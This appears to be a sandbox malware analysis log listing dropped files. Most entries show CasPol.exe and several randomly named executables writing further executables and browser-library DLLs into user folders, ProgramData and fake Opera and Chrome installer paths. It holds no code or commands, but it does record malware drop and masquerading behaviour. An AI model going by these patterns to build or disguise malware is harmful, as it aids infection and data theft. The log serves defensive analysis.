Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\xin[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Opera_105.0.4970.16_Autoupdate_x64[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	File created: C:\Users\user\AppData\Local\Temp\7zS2AC3.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\setup294[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	File created: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\41rSfwrrEtzdo8l6hDX9qUIY.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\OUk0jc7FyA7JiXBcKBsav4Ex.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\umhbJjT22X2dBDA8G8Ex8Mum.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\Xkv4Yy91IYUWlrxVDJ9pNrAt.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\ikxtQFXRCEfEHQTLmAUzD8qT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\nql3mTXVYbBdwRCyxTdPASFH.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\TuMaHDPzxpAHNRHHe8lrgtR8.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\jjgHySnKRf0NbElCZVSQsmlU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\FQZj93JMuVq0BS5wWbmLlvdz.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\bIcj5NJCkkIc9XclTK9WXZLS.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\6D0wEbfp4dy4jAN7wi8NeRqk.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\yiUYZEb7lMWdy4BiiNcsQQJX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\TNpJBjREJ9Gyf03FTGsVwgMm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\1mdoluAIy6r3F43oFWoG2Z1G.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\wzL7YtWHPdRZ8NMx9zj6roAO.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\vgRJuNFVl7G0nCRX5ErRiSV0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\GpflmvanezvTQUdAxFgnanZZ.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\99Xilbvd4jSilvCMPk8Sud3T.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\tuwxsmmkPgY2E0qU41YG7RXX.exe	Jump to dropped file
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2311211412299612284.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\IgLVruhTQwPebTeeX6NZCbz1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\kU3XrqGZNssn3brmhPHjP88a.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\av4uoJUKtp0Dae50mONtR9f9.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\nAYvFI55VRrTI2EB1vGUUN7i.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\8TF9AtsMAWKytLiZaNJGNowl.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\kvNC7tDmYUgdIYLH90ijrXsg.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\k0pYXiEKtAOcp0Nk17UQ5_g3.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\VNjvZol8PlRMOfu5WlQLfgQN.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\3zo1tV5f3Ay9BnN3gEE89S3s.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\uScPA2mexaYLqHB3aMjewISk.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\qzdHRnL14SmqTwYSc4zayuZy.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\XIP5yv6jsSsJrnkuXRlubTEg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\a00oNFnYUapr4qcZYFTTBItp.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\eahQfcDSk2Fi3XgQUppzGpDN.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\build[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\1Pr2wNZB1b6nfW4H5bxYRlKb.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\sqlite3[1].dll	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\jf03kWzRd1Y8NYHdcHEpAddx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\4f5Nx5TIr9aFLxNLjJPgXzZC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\YD9zE2itWi7M0MjuwQoyJNq3.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Service_32[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\vXAyxin9GdGRVJbV0cVRgeZy.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\ss18o36u7ZpVeBt30wfMc6QL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\t0HvpFnGKfslo4cGMsCK308u.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\j4PByMYVUXG02LUhnYCAO1Ii.exe	Jump to dropped file
Source: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe	File created: C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\IgULl9WjdOj8mJztw0uHvxbW.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\MU7AyJXazu2eUzmvWRSMabWh.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\eKj7ykPTdurhRDTikGCPfMkr.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\eoK_HtB8HzOnJQBreBydnt5f.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\6CYB0iVk9rownSr74i6xHL6G.exe	Jump to dropped file
Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\7vGVJ4vo69rcWRQudRLDXauN.exe	Jump to dropped file
Source: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\LnQdFAFVk46H7elzEZZ3Xdvx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\pO9O069hprtxLGedb5CFsbLO.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\HRRT0RMuxgFA6Ej0EVnWrxGq.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\kSoeiDedOAsNYRmhaJ0MUJfS.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\qazyFwc5egFZzR0N8tqSvKmm.exe	Jump to dropped file
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2311211412307813128.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\4HEo1sjjkhLSQkWpfp7Tvy6i.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\gfhvq0lCOSbYQVB1nKgfu6Hp.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\36b88b89v[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\6Y6HZLXw0Y38mRwaQb51f9Xr.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\uu6QpglSdgLwfavYe0Q48iRO.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\MCSU0hpYCBYwreTAx2gvQqTW.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\ghRQ9o9v0E1RiBJYsVlARkCv.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\BBqYMraWtNak9E70T03xv71q.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\b7rS22mUxj3RgBOeSVcYPglZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\674Kdwx0QZ5HYr8oith6hwyE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\4hEl5UUyWTEkI93Zbzcn8KjL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\TYAlD9K38T8WbNsaQQTkm89X.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\nZyDVnEdKbWT6VJAEI93BfTp.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\dGDzhUFIRKv6GPXQTIFzAmvz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\JJ3cNx9vKHcCuMyuszfvJls9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\flBIeyQ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\UV2ekc96ueAaOxPpQGhh8Pd0.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\WVaSUNuxBDiOsviBr0A0knGj.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\TEhCDDZR3kab9b6eJrW6Zmon.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\Dx8BL3JGqSY2hu2cpbycpB37.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\xaRtMl281tBvEQLxjcEm29sg.exe	Jump to dropped file
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2311211412549847716.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\q3wz7sJmTQgL2ejSFHqUOz9e.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\SqalFpG888aZxKTidsmLhW66.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\hgwfufOe3R4R5MGcSn4VNNng.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\Dd4nzJ5vUMeQnN3MK6ZRgV3f.exe	Jump to dropped file
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\r1O81gOTKkD0PfSdUigHGcl2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2311211412316924080.dll	Jump to dropped file
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2311211412344515864.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\TEhuAzeHGIKa58PbdimMPWMQ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\KTrOP3dHFImCgksUms5y6GT0.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\V77ImAzjtVAt7W94zmw0o9VA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\vTVX1iVz5ykXIf2WVHggfoE1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\cfFApIZxb8kkHuTB0N89Kc85.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\NMVWvUSYQ5v8UtFVuNmXDI3v.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\b4zg4yZEcBA3hWZ7TCSqnxRv.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\NrSR7wL9a6ScJhHM3ZR1vnHv.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\mVd8JjiAeizZqfVE2Y07H3YG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\fvOd5pvADdxILNx2P8qpoMRr.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\GckHmHzvxMyOVH2C2DacdLqs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\YGRs52NUZm6ZTeu1K4eZCg73.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\Uh63v7VRNzUECDRm8xH2VdbS.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\H62xkOOft6fSMQ98kaLeH0L3.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\DmQpa169gKNUW68eMJzuiNW0.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\sgT91h1OakHt6BAnyK2HYdhK.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\5U7pU4qonDh086kabD4VqfeM.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\lx1ggIRPyoQP8uRSWNRnkZlF.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\l2VGlkyVE7xUJ5Ydz5l8CsC0.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\qdAZRB67pUDSB4XELDqUzkpA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\AwrGvSh0VNKMWo4lmCJZrqGt.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\RRe1rhCZ16opf2KOV6fOjlXA.exe	Jump to dropped file
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\OPqTdTFbxWlK6znimRD995XD.exe	Jump to dropped file
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2311211412373835848.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\wPTezzgL34kfssQVp6uEza55.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\wwJcXZC0IBum93LDA1ZMzXtI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\LIMPKWkTxHbhz8UQouDq3EgS.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\36zVB2iUP7gf6aRwVtLyHdF2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS20C1.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\TcGLfdTBaos9JgPXgH8pOdVr.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\loKi89nha4JKgsufhuKQ22oF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\pMwJfWjrgWqYhqUsQy3kovLv.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\bsjI0DIR0uTLrijb320XXGIp.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\oPsY54K8dfpMIWUfMwWVjb8v.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\O1pHCqcpXPsB2X19IwAi5F3Z.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\37Xh5AWBBTFPX7DCQvpQDJWI.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\ohQpGh89_DKtYLyMVbmJ3Rtn.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\xgYlvCudFc3GJuvg0bXJwObm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\FpP9TKUra38F8BD04FwCoPto.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\q1fbqWmUkeV1isNfzfpkGonN.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\freebl3[1].dll	Jump to dropped file
